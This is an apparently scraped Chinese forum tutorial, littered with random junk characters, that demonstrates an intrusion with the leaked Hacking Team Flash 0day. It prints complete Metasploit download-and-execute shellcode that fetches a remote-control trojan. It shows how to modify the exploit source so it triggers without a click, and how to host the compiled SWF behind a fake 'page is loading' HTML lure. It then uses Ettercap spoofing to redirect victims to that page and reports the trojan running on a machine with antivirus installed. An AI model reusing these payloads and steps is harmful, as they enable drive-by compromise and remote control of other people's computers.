|
% W0 U4 q! O3 p7 _ 三、flash 0day之手工代码修改制作下载者实例入侵演示
% T5 |7 @7 F/ z# W( p
: u" n# g; }" S/ n) x2 Z/ Z1 A: c$ O/ D) g, Y( ^* @
利用到的工具: ; x/ D* E, u5 h$ C* \
, K4 ? a% F2 s6 X+ b& S6 O
: \. h: I; y% e e0 s0 b
Msf
9 _6 \1 k! e/ C% S. f
3 C, e0 {9 ~# m* I& R
+ _& b# l& ]% \, E Ettercap
0 g' g0 o0 S) G0 {7 D
8 J% B! e8 l. A# z. V( P- J
) X+ Q8 t4 r- c Adobe Flash CS6
1 R7 R" z% }8 G+ X9 Z ! \1 g3 b1 H) u" M% ?5 m5 C
6 Z/ I* z W- z( J3 s/ Q; q6 y Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 ! o# o2 K- ~9 Q. m* L
; g$ s8 }& \: r3 `* N
: ~6 p! ~/ K: ]1 Z* i& }7 M 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options 0 O: k4 ~9 Q- [' j+ Z
: z6 ~5 o5 @# [
& H% ?, s( ]3 D" y! K2 a 如图:
j$ n2 W( [9 G6 ?, ~5 t; A1 D % ^, \+ M6 K, M8 W$ K' L5 r
4 L' i8 S' r m6 D) J
) a% \* W1 V) K4 @
3 S# G' G+ `6 [3 ^: C \0 u: |2 Z0 _# w+ v3 f8 F6 [9 {
 # X; g, M2 v8 Y0 P) ?
$ O9 d; o& `0 i* d5 Y8 v, s
% S/ D1 B7 _, U" |* k2 L 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 7 s, R" ^( ~' i9 @: W
1 |. P4 l+ l* G- s
F8 e. p$ k2 J, d& m % }8 h% z. @9 r
4 p% a* J0 e# M8 ?
) x9 b% Q* r% v* O( [8 v8 D* M
8 C* `- b. H2 }- h! e2 ` : S& l: }5 ^! ^$ s- f! G; r' E4 q
{. }# g- e' Y, ^: Y
然后执行generate -t dword生成shellcode,如下:
# p, @+ U; \: p* |4 P9 i 2 w7 H% c0 v! e# |. V* ]! m
3 H1 f* m9 Y: g2 `9 q; c" c' @& g  4 Y7 v! D: Z3 D& `( }) C
9 C% y8 E2 L3 {
A: [+ t5 @* t1 m+ v% Z 复制代码到文本下便于我们一会编辑flash exp,如下: & }5 W5 S7 ^6 E% x' v; ?
% ]5 i- R3 o/ f3 b
! a4 ]& t+ e% Q9 \0 ^# c 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
* c4 `0 ?4 N a* J6 C* G! W
& N1 k+ Z0 }0 W% f* G
# Z g1 ?0 F) ]; ]8 I1 n 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, % `- X! ^% ?/ ?8 A
4 B; J- c% k$ p9 Z: V9 {1 K
- k/ {9 K3 t$ i8 j" U2 h- O' [ 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, % ?7 o7 ] U# t0 `7 l5 v
; H0 v: y/ p, d+ g2 P4 C' p3 I
2 d+ o& I' w4 n" H& E; o
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
! T2 B- _) u/ J5 s% U
4 T3 \; u7 L& l! m+ n9 D4 V8 t: Q; l* u
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, $ Z& ^) l1 }& S9 ]9 g2 C- v
' F2 [$ ] _8 v7 L
/ W4 L" B2 z7 h8 E& N 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
& c' n+ s8 P$ G/ I % B! [* ~) h: f
( N% s# u0 U f" g' ~% J
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 6 F/ q# H4 x- A# N
; W* R6 d3 m' z1 q: ?1 N; C% W
/ K3 u- b2 f9 D3 D$ L5 R 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 0 y+ b. V( k o% G% L* t
2 X. ~' v/ X( }! ?' f
3 p( ]) t% H# W7 W0 C n
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 8 w/ V( w% T) e( G& ?/ u$ w, e
& E: a( B* d* O! B0 M, `. B9 i, {
+ I3 v u9 p w" b% {# N 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
7 C: a, Q S% B. |& o# I
3 ]7 @1 ~" l1 K: g b! ^* H+ Y7 x1 ?
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
, l1 y+ T4 ?6 _4 ], Y# O% C 0 c$ B4 W& I/ B6 K& e
8 c& `8 F' N5 W2 F; b8 ^& w# D
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
7 [9 U+ H- R9 c) b' M$ j5 j' p5 P
) H% [! M2 Z9 X5 r* K' ~" v! ^! ~& i6 k( C8 p
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
& L: i9 i0 a% O/ [
8 G; M, L. q: |0 i8 j& ^1 ]6 H7 R; l' B# S" B& C& F/ A X+ }& v
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 : u& X9 t. E% K$ |
3 n( q. k- m1 C
, c a2 V+ Q& k# ~' k) X) W2 K8 e
/ J& p& D3 {" a$ n' H - h! X( X- g# F
" F' ] w9 t& O! A1 r6 k
% Y9 I, u0 C$ ^% [' J
" B" y l% C$ ~2 ^0 K2 f0 h/ T' }: f" n0 |6 a/ J
下面我们来修改flash 0day exp,需要修改三个文件,分别为: & ?7 b" O, X) a
5 {- j- `: f, m0 h9 m
2 A8 l3 q- {4 r3 G1 Q5 a# X5 n 
+ w. R5 ~5 u) L; P' W8 K8 U# c
' A- J# q5 m$ V% V( Q4 d4 D0 [" |: E: [6 j& @+ o
先修改ShellWin32.as,部分源代码如图:
. D& V; r0 V' l * o/ o3 K4 l- W
+ Z3 |! ^" c0 T% ?) T# W; c$ T
4 {( Q D k( h% F, b6 ?4 s 1 d% ^/ D0 q+ j
# C- Y2 d/ J' L/ j* \ U
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: ( o- t- B5 ^* l4 g, r/ s9 Z2 x
6 W P; f0 g" ?0 m2 `1 R
H) x9 X2 M0 d& l+ }4 q: h  4 F2 S! s2 Z2 `! ^9 A/ i
$ F) i1 s2 j, M( Z
1 M7 \. \* B# c7 E4 I) D7 M 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
) M7 J$ q4 m+ Z , y6 a4 D6 ?( f* n7 t( W$ s( z K p
: b# f1 A* Y/ B1 F2 S% U9 ` 
. n4 V& ^3 u K' @* D6 h4 e; o- C 8 H0 g2 i" E+ b& a% i% }' a6 \) v3 I
! N! J; F9 K P% @# z* B
换行在后面加一句TryExpl();注意是l不是数字1,然后如图: & a: g# k4 P1 w: B
! u# H1 `( W3 N% O5 g
6 ~- r- j+ U' H* D2 E1 Y n a, P p7 m0 q
0 }- D/ a% H3 A4 Q! c; t6 \6 ^6 W! o: q+ r4 Q
, [$ U$ k# ~% \7 [6 o+ f5 }
/ U! `0 H( @5 E0 q7 x9 l
( u4 P" d9 `. W, D1 }+ B" H  * G+ f% L3 @4 ]6 d* k( X
, |6 n# b! G. Z9 _8 U: X1 ^+ k5 O* E" R7 d% D% B" Y$ m! L7 Z. `
然后点保存,下面我们来编译一下,打开 3 Z& W6 B! [0 r" x* k5 r
~, I) M2 P- j8 M' y2 D
2 @# C. b, M, P4 I _. v+ | exp1.fla然后点文件-发布,看看编译没错误 * U' k( @ u& F a4 m) d3 L
/ J5 C6 S' Y. u8 u* T O& ^
9 T# T$ d& k- D j" R ' B" S) v. e4 z
' A0 @. k& b/ a/ i8 A/ s
1 V+ F, f4 P( u/ E& i 5 [) ~& P0 @! D. x
" q( J, F- p6 j
' D1 Q# [1 c$ v9 F
2 t. m j) b# b8 N v : H" o. v( t! X* \* K ]" R" o
! }* g- M0 W9 e% @/ B: ~ 
& ~! l3 \+ w: h7 p$ v 7 Z( j* p3 j2 K' R$ a$ s9 E
+ B2 o o8 x- B- o! H3 t$ N 然后我们把生成的 % w4 c5 i8 Y' _4 h$ n
# e" \% y% }- h& R" s S& L5 v* G; g, \
exp1.swf丢到kailinux 的/var/www/html下: ' N: m. A* n& Y
+ d# C8 }1 g8 h0 z4 L+ H6 {
" y& a3 Y# T' s0 } 然后把这段代码好好编辑一下
, A- U) T. q, P: z8 o" p- f2 o 8 R& F G5 B- n2 A' z
5 u |. K% D, ~$ ^. k
" Z: r. x r/ p' v! @, p
6 \$ w: q9 I: L4 R9 S3 L0 f+ K! c& Q" o& I) B# x6 f
4 x! ?! k7 s: ~9 b7 [/ i1 r
1 b1 L$ F# e, B/ X- F/ {
7 {8 F" R: d5 H- x; L0 V
0 s8 _/ W) O: k7 f, n, [ A / y7 s3 M1 o! r" p( }3 R
4 G4 v# L8 ]8 v
* k# R N& V. R9 X1 `0 D' B+ H3 v
) ^# `' P3 F. ~
O, I1 u. [0 X+ h8 Q+ I7 q ( m7 T/ d5 [( Q+ C
) p) ~4 p/ G/ B8 |& L |
+ x. _0 b: t7 \7 @* J % f5 Q' x0 E4 h5 @
$ N2 |- Z" n! j K+ ]5 n9 l
2 ]/ @3 K* u4 v* W9 d2 V <!DOCTYPE html> 7 j% n2 ]9 J# a0 j5 B3 i
6 }" R; }7 }) y- q/ W' y$ e/ m; H7 {0 W: u* }3 a, \# H1 r; B, o# D
<html>
3 |/ ~% T; F# I0 Z. n9 U2 I0 F ' ?2 x( M# \; d* R- s+ |
8 c- P# W4 S- J P$ m# z. g
<head> * Z5 e" Y. H0 b, ^
" P; ]) n" f8 w
# t2 `1 b6 k' J0 Y! U* j& l- E <meta http-equiv="Content-Type" content="text/html;
( s- C2 k, U) ]- i / X: F% M' E4 D# V$ _
9 n5 ^( s9 C; f; M2 G charset=utf-8"/>
3 d0 t' g% t, t' \ ! o6 E! t# h+ j
5 T# `- d6 N1 u' D </head> ; K$ p* X5 H) ?: {
4 M% ]9 [5 e+ ^' p9 w# V
$ G) [" x3 ~* W Z' x6 Q& |
<body> . F/ D8 } B9 @% @8 E" G5 M
& i; ^2 I8 k+ J0 }3 _
; z# d |2 M( f9 x/ g& y
<h2> Please wait, the requested page is loading...</h2> 7 M; V* G9 e2 ~4 j4 f# S' D
) ?% \( |) ^+ Y- t X
% W' d8 v# D9 R' h9 y* F: @; ]
<br>
* O* L, O3 g& R+ X2 _ & v, Q) D) E% c
0 b9 T+ n/ h' |/ b& B <OBJECT 1 t9 K, s b& D6 Z( I' w9 Q% T: B
& ~4 D0 V; V' d& s1 ~
3 D4 H! N3 x" s* h classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
: k1 s& D) Z' R: r- v, f u5 X5 h5 e/ F- z2 y7 {
' C! w* W/ N- n6 K
VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ( X! s; V R# G& Z( C" Z7 }
& K" X K0 x) i; E7 Q+ W, T
! q c$ U& t) ?! h% O2 M6 g1 {0 a </body> / Z' o' ^+ H- T: i. r8 V' u9 `. p
% P9 W- P/ z* I8 V
$ h- g8 O# U6 R' A7 l; e4 U* S <script>
6 h5 Z" I: H5 M9 L G5 f; D! p/ c
& Q8 x* H# M2 ~" D! c5 h$ { setTimeout(function () {
5 N0 B# C( c6 [/ ~* t: p % {. ~1 T4 n4 a3 U$ h b
& L! v3 X5 ^1 A2 E" s7 E1 N5 ?. W7 w
( [( j' B3 r! f- Z* g# V* a' |
( M; h0 V$ J; r6 J3 j7 f. r7 J( l* R" f6 P
window.location.reload(); G+ V, P: x0 s
$ B4 i9 H$ v9 r
/ n! |* w; H: I6 G2 M4 j7 i
}, 10000);
5 d6 b' u2 |3 \
" @& c/ K- q) m
7 F# e8 o) g0 ^8 K1 N+ w
$ M, c0 \# u+ ?# t) K7 {6 T0 q2 x ' ^( N2 [. g+ Z& ~
; a+ }7 [ L; _8 k7 N& v3 S/ B
</script> " u/ j) z2 B1 e E1 k, ~4 g3 Z% l
5 K1 s2 O& d( H9 Q
4 y ~- j, ^" j6 d </html> ; J( ^6 U. @9 j T
4 V: [* B2 y( h. [
) \; G" U; U0 [; Z8 r* E& A 1 N N, Q6 H7 |& k7 K0 d
% q0 |% p) J0 e- ~2 K0 w
% c+ b Z" P& ^+ Y7 q 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
1 H- F1 S1 C9 K1 Y2 Y* y
% ~4 }# D$ p( V7 b
5 v6 k0 B: U4 [  1 P( y- t. C9 B7 @$ A/ [
4 z" R& h$ [9 Y' S2 V, ~/ ]: a
- Q4 {6 c5 ~: h; \4 M
( }5 |- \+ T8 J+ n
. A% J8 k) e6 G3 ~( W7 ^3 p& U
5 K6 A; \! L4 A q- \2 p2 a
2 j3 O- n6 i# R3 A 7 X: t- R. T* r3 ]1 W( h
) j; U n* |5 [7 M: J1 \
. j% ]2 ~* M8 W/ Q1 p Z + ^+ |5 P% K0 W0 q5 G* S
) D1 n% O( `4 p( ~
2 a. P& X7 u" O; W. V' L! V 0 S) [1 T- V* U2 ?
0 N; J" B4 r4 k b 下面我们用ettercap欺骗如图:
0 e( @: l! O/ A: i+ J, r8 x7 n
+ k/ c% z# e$ x: }! R# \ W! X0 E# `9 t$ i! }
 ! W& P: r$ K' M0 u, Q4 A1 r1 D
4 v5 X5 b; Y N; b
; N3 y& t& n% U7 O! w2 }
0 K. `5 ~& K K8 ]" V
% t( ]5 h- o: t4 c
9 N- s' |" A2 U 下面我们随便访问个网站看看:
+ x' `1 \- B9 ?& G8 \( O
) i6 l2 f& ?+ [6 O1 m
1 p, e0 r8 A4 R2 c5 t# X6 E 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: ! k& P, x$ c4 E
. k }, |4 M- h" S, u6 p+ F
* K( R" v. k' J! S7 o$ l( ` 
; d$ g" ~4 D" R+ u K; e 5 J9 N' B% \5 O8 C
1 N4 Y. z) ]) r0 z+ o
我们看另一台, 9 |4 f6 l" s. l: X( X( j
. C% e" |. N: J6 v- {% U7 s
: L# ?" @" }: O( v$ r! A
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
8 O9 I- a$ J9 Q! t | 
发表于 2018-10-20 20:28:55
收藏
支持
反对